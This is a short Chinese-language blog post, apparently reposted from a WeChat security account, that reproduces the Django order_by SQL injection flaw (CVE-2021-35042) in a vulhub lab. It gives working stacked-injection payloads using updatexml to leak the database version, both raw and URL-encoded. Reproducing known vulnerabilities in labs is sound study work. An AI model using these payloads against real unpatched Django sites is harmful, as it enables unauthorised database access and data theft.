Django SQL注入漏洞(CVE-2021-35042)快速复现
2022-10-28 08:48:42 Author: 白安全组(查看原文) 阅读量:39 收藏

前言:

Django在2021年7月1日发布了一个安全更新,修复了在QuerySet底下的order_by函数中存在的SQL注入漏洞

正文:

这里使用vulhub,不会的可以参考前文,选择目录然后启动:

使用启动命令启动,然后我们访问一下

你的ip:8000/vuln/?order=1

我们构造一下order=-id,这样会产生id降序的结果

这里可以使用堆叠注入来完成。

我们构造语句:

?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@version)),1)%23

提交,其中vuln_collectionvuln应用下的模型Collection,这里语句是出现版本号。

http://192.168.119.136:8000/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%[email protected]@version)),1)%23

这里成功出现,完成注入。

近期公众号运营时间会比较紧,作为个人公众号忙的时候就会发文较少,请大家见谅,可能会发一些比较简单的学习教程来填补空缺。大家多关注公众号的最新推文哦。

扫描二维码关注我们吧!

微信公众号:白安全组

qq群:70844080

网址:www.wangehacker.cn


文章来源: http://mp.weixin.qq.com/s?__biz=MzU4MjYxNTYwNA==&mid=2247486177&idx=1&sn=86dde5ec4afc6c5c588a9e2007679fe4&chksm=fdb4ddbacac354ac83300f7cb15e20a3e64e5e3537445b279ae659fbda2e8c0ac300b1c67470#rd
如有侵权请联系:admin#unsafe.sh